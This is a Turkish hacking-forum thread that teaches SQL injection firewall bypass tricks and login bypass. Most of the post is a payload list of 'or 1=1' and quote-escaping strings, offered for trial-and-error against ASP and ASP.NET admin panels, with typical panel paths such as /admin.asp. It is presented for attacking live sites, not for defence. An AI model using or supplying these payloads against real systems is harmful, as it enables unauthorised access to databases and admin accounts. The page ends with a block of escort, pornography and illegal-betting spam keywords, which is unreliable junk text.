Konu Bilgileri
Konu: Bypass Metotları,Mantığı Yazar: Risk-Master
Okunma: 1370 Yorum: 2
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
Bypass Metotları, Mantığı

Mesela bir sitede SQL İnjection açığı buluyoruz fakat bazen Güvenlik Duvarını (Firewall)'i Bypass Teknikleri ile aşamıyoruz?
//--+++** gibi işaretlerle deniyoruz. Fakat sonucu alamıyoruz.
İlk olarak mantığı anlamaya çalışalım.  Hatayı kapatmaktansa neden bypass ediyor?

Biliyorsunuz ki SQL geniş bir dil, a yerine A yazsa problem çıkıyor.
Şimdi bunu böyle saatlerce arayacağımıza hatayı bypass ederiz mantığıyla düşünüyorlar.

Tabi hatayı aramaktan daha iyidir. İnternet-te biraz araştırıyorlar ya da bir şekilde sitenin sonundaki değerlere yazı yazılmasını engelliyorlar. Tabi bütün her şeyi engelleyemezler. Sistemde bir hata var her şekilde bir yerlerden o hata çıkacaktır. + o,r,d,e,r gibi db (database)'den veri çeken kodları yasaklıyorlar ve buna forbidden (Yasak Erişim) diyoruz.

Peki bu durumu nasıl aşabiliriz?
Tabi ki de +*- gibi karekterler aracılığıyla;

Diyelim ki bunlar da olmadı ne yapacağız? 
Hexleme işlemini yapacağız. Hexliyerek bypass edebilirsiniz.

Bu da olmazsa ne yapacağız?
Artık özel karakterleri deneyeceğiz.

Örnek verecek olursak;
site.php?id=23 union select 1,2,3 ve baktık forbidden (Yasak Erişim) ya da "Sayfa Yüklenmiyor." gibi uyarılar geldi.

Şimdi site.php?id=--23 ((union select 1,2,3))

Bu şekilde denedik buda mı olmadı?

Çok kullanıcının aklına gelmez # koymak. Burada esas olan kodu Bypass etmek değildir, önemli olan değeri bypass etmektir. Kod zaten yasak ve sistem zaten bunu okutmaya izin vermez. Fakat değeri Bypass edersek değerdeki id değeri değişmiş olacaktır. Bu yüzden değeri de farklı okuduğu için db (database)'deki açıklar sayfaya yansıyacaktır.

Bazen sayfaya kırık resim linki olarak yansıyor. Bunun sebebi db (database)'nin resmin URL adresinde olmasıdır. Resmin sağ tıklama ile farklı bir sekmede açtığınızda resmin sonunda istenilen kodlar olacaktır.

Login Bypass Metodu

[Resim: 1GA87p.gif]

SQL Injection Saldırısı veya "Veritabanı Saldırısı" olarak da bilinen ve halen bir çok site için geçerli olan yönetim panelden "SQL İnjection Saldırısı" yani "Login Bypass Yöntemi" nasıl yapılır, onu anlatacağım.

Genelde Windows sunucularında çalışan Microsoft Web Uygulamalarının (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir. Microsoft Access ve MsSQL Veritabanı kullanan sistemlerde bu saldırı yöntemi çokça yapılmaktadır.

Bu saldırı PHP tabanlı MySQL Veritabanı kullanan siteler içinde geçerlidir. Tabi PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir.

NOT: Ek olarak Kullanıcı'nın şifre bilgisi MD5 olarak kriptolandığı içinde bu saldırı çeşidi PHP sitelere pek yapılmamaktadır.

SQL Injection Saldırısı'nın en basit yöntemi olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici **** kodlarını yazarak panele giriş yapabilmektir. 

Bu saldırıyı aşağıdaki kodları kullanarak Deneme Yanılma Yöntemi ile yapabilirsiniz;

ASP Siteler için SQL Injection Login Bypass (Türevlerini artırabilirsiniz.)

Kod:
- or --=-
‘or’1’=’1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin-or 1=1 or --=-
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin-or 1=1 or --=-
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*

Eğer hiç biri işe yaramadıysa birde şunları deneyin;

Kod:
- or true--
-) or true--
-) or (--)=(-
-) or 1--
-) or ('x')=(-
- or true--
- or --=-
- or 1--
- or "x"=-
-) or true--
-) or (--)=(-
-) or 1--
-) or ("x")=(-
-)) or true--
-)) or ((--))=((-
-)) or 1--
-)) or (('x'))=((-
---
-+-
-&-
-^-
-*-
- or ----
- or --+-
- or --&-
- or --^-
- or --*-
---
-+-
-&-
-^-
-*-
- or ----
- or --+-
- or --&-
- or --^-
- or --*-
or true--
- or true--
- or true--
-) or true--
-) or true--
- or 'x'='x
-) or ('x')=('x
-)) or (('x'))=(('x
- or "x"="x
-) or ("x")=("x
-)) or (("x"))=(("x

ASP.NET (.aspx) siteler için Login Bypass kodu;

anything' OR 'x'='x

Genelde şu tarz admin panellerinde bulunmaktadır. 
Tabi bu yöntem sadece bunlarda denenebilir diyemeyiz.

/giris.asp /yonetim.asp /login.asp /yonetici.asp /panel.asp /admin.asp vs.
Ara
Cevapla
#2
Konularını takipteyim, Mükemmel!
Cevapla
#3
(23.09.2014, Saat:22:34)atawho Adlı Kullanıcıdan Alıntı: Konularını takipteyim, Mükemmel!

Teşekkürler
Ara
Cevapla


Bypass Metotları,Mantığı Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Synergica Solutions SAS Admin Panel Bypass - GHDB Exploit TurKLoJeN 4 1,411 28.05.2021, Saat:21:28
Son Yorum: hayrom2253
  Linux Server Root Bypass Sunucu Gecme Hedef Site Hackleme hackerking2 1 942 03.05.2021, Saat:14:00
Son Yorum: linoh34128ss
  Dinamik İşler Tasarım Bypass Admin Panel with Noredirect HeRoTurk 1 618 01.11.2020, Saat:22:54
Son Yorum: alonekoding
  2020 Cloud Linux Bypass Shell ( Cent OS Kernel6 <= x.x ) - Shellizm.com DuBaR 2 528 13.07.2020, Saat:14:11
Son Yorum: DuBaR
  Priv8 Bypass Kzsg 22 6,514 08.07.2020, Saat:17:12
Son Yorum: Yoono


mersin escort güneş koruyucu krem izmir escort izmir escort gaziantep escort canlı bahis siteleri tipobet bahis siteleri kaçak iddaa canlı bahis mobilbahis deneme bonusu deneme bonusu bodrum escort kuşadası escort türkçe altyazılı porno hack forum escort izmit Horny pornstar Heidi Mayne in hottest gangbang, facial porn scene free sex videos antalya escort antalya escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort anadolu yakası escort mersin escort konya escort